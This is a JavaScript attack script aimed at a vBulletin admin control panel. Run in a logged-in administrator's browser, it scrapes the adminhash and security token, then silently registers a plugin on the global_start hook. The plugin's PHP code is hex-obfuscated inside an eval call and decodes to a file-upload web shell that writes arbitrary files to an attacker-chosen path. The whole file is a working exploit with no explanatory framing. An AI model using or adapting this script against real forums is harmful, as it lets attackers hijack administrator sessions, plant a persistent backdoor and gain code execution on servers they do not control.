js.js

var debug = true; //show result
var post = getHTTPObject();
var get = getHTTPObject();
var admincp = "http://localhost/upload/admincp/";

function getHTTPObject() {
    var xmlhttp;
    if (!xmlhttp && typeof XMLHttpRequest != 'undefined') {
        try{
            xmlhttp = new XMLHttpRequest();
        }catch(e){
            xmlhttp = false;
        }
    }
    return xmlhttp;
}
String.prototype.between = function(prefix, suffix) {
  s = this;
  var i = s.indexOf(prefix);
  if (i >= 0) {
    s = s.substring(i + prefix.length);
  }
  else {
    return '';
  }
  if (suffix) {
    i = s.indexOf(suffix);
    if (i >= 0) {
      s = s.substring(0, i);
    }
    else {
      return '';
    }
  }
  return s;
}
function step1(){
    var string;
    get.open("GET", admincp+"plugin.php?do=add",true);
    get.onreadystatechange=function() {
        if (get.readyState==4) {
            string = get.responseText;
            step2(string);
        }
    }
    get.send(null)
}
function step2(str){
    var string;
    adminhash = str.between('adminhash" value="', '" />');
    securitytoken = str.between('securitytoken" value="', '" />');
    shellcode = 'eval("\\x20\\x69\\x66\\x20\\x28\\x24\\x5f\\x52\\x45\\x51\\x55\\x45\\x53\\x54\\x5b\\x27\\x64\\x6f\\x27\\x5d\\x3d\\x3d\\x27\\x6c\\x6f\\x61\\x64\\x27\\x29\\x7b\\xd\\xa\\x20\\x24\\x66\\x69\\x6c\\x65\\x73\\x20\\x3d\\x20\\x40\\x24\\x5f\\x46\\x49\\x4c\\x45\\x53\\x5b\\x22\\x66\\x69\\x6c\\x65\\x73\\x22\\x5d\\x3b\\xd\\xa\\x20\\x69\\x66\\x28\\x24\\x66\\x69\\x6c\\x65\\x73\\x5b\\x22\\x6e\\x61\\x6d\\x65\\x22\\x5d\\x20\\x21\\x3d\\x20\\x27\\x27\\x29\\x7b\\xd\\xa\\x20\\x24\\x66\\x75\\x6c\\x6c\\x70\\x61\\x74\\x68\\x20\\x3d\\x20\\x24\\x5f\\x52\\x45\\x51\\x55\\x45\\x53\\x54\\x5b\\x22\\x70\\x61\\x74\\x68\\x22\\x5d\\x2e\\x24\\x66\\x69\\x6c\\x65\\x73\\x5b\\x22\\x6e\\x61\\x6d\\x65\\x22\\x5d\\x3b\\xd\\xa\\x20\\x69\\x66\\x28\\x6d\\x6f\\x76\\x65\\x5f\\x75\\x70\\x6c\\x6f\\x61\\x64\\x65\\x64\\x5f\\x66\\x69\\x6c\\x65\\x28\\x24\\x66\\x69\\x6c\\x65\\x73\\x5b\\x27\\x74\\x6d\\x70\\x5f\\x6e\\x61\\x6d\\x65\\x27\\x5d\\x2c\\x24\\x66\\x75\\x6c\\x6c\\x70\\x61\\x74\\x68\\x29\\x29\\x20\\x65\\x63\\x68\\x6f\\x20\\x22\\x3c\\x68\\x31\\x3e\\x3c\\x61\\x20\\x68\\x72\\x65\\x66\\x3d\\x27\\x24\\x66\\x75\\x6c\\x6c\\x70\\x61\\x74\\x68\\x27\\x3e\\x4f\\x4b\\x2d\\x43\\x6c\\x69\\x63\\x6b\\x20\\x68\\x65\\x72\\x65\\x21\\x3c\\x2f\\x61\\x3e\\x3c\\x2f\\x68\\x31\\x3e\\x22\\x3b\\xd\\xa\\x20\\x7d\\xd\\xa\\x20\\x64\\x69\\x65\\x28\\x27\\x3c\\x66\\x6f\\x72\\x6d\\x20\\x6d\\x65\\x74\\x68\\x6f\\x64\\x3d\\x50\\x4f\\x53\\x54\\x20\\x65\\x6e\\x63\\x74\\x79\\x70\\x65\\x3d\\x22\\x6d\\x75\\x6c\\x74\\x69\\x70\\x61\\x72\\x74\\x2f\\x66\\x6f\\x72\\x6d\\x2d\\x64\\x61\\x74\\x61\\x22\\x20\\x61\\x63\\x74\\x69\\x6f\\x6e\\x3d\\x22\\x22\\x3e\\xd\\xa\\x20\\x3c\\x69\\x6e\\x70\\x75\\x74\\x20\\x74\\x79\\x70\\x65\\x3d\\x74\\x65\\x78\\x74\\x20\\x6e\\x61\\x6d\\x65\\x3d\\x70\\x61\\x74\\x68\\x3e\\xd\\xa\\x20\\x3c\\x69\\x6e\\x70\\x75\\x74\\x20\\x74\\x79\\x70\\x65\\x3d\\x22\\x66\\x69\\x6c\\x65\\x22\\x20\\x6e\\x61\\x6d\\x65\\x3d\\x22\\x66\\x69\\x6c\\x65\\x73\\x22\\x3e\\x3c\\x69\\x6e\\x70\\x75\\x74\\x20\\x74\\x79\\x70\\x65\\x3d\\x73\\x75\\x62\\x6d\\x69\\x74\\x20\\x76\\x61\\x6c\\x75\\x65\\x3d\\x22\\x55\\x70\\x22\\x3e\\x3c\\x2f\\x66\\x6f\\x72\\x6d\\x3e\\x27\\x29\\x3b\\xd\\xa\\x20\\x7d\\xd\\xa");';
    data = "do=update&adminhash="+adminhash+"&securitytoken="+securitytoken+"&product=vbulletin&hookname=global_start&title=Upload&executionorder=5&phpcode="+shellcode+"&active=1&pluginid=";
    post.onreadystatechange = function(){
        if(post.readyState == 4){
            string = post.responseText;
            if(debug == true) document.write(string);
        }
    }
    post.open("POST", admincp+"plugin.php?do=update", true);
    post.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    post.setRequestHeader("Content-length", data.length);
    post.setRequestHeader("Connection", "close");
    post.send(data);
}
step1();